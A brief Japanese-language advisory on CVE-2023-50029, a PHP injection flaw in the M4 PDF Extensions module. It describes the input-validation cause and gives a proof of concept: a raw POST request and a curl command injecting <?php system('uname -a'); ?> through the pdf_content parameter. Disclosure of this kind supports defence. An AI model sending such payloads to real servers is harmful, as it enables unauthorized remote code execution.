
CVE-2023-50029: M4 PDF Extensions Module における PHP インジェクションの脆弱性
CVE-2023-50029 は、M4 PDF Extensions モジュールにおける PHP インジェクションの脆弱性です。この脆弱性により、攻撃者はサーバー上で任意の PHP コードを注入・実行でき、標的のシステムを完全に制御できるようになります。この問題は入力の検証が不適切であることに起因しており、悪意のあるコードがユーザーパラメータを介して渡されることを可能にします。
POST /generate_pdf.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
pdf_content=<?php system('uname -a'); ?>
curl -X POST http://example.com/generate_pdf.php -d "pdf_content=<?php system('uname -a'); ?>"